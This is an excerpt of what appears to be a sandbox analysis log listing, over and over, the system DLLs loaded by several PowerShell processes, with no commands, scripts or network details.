Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
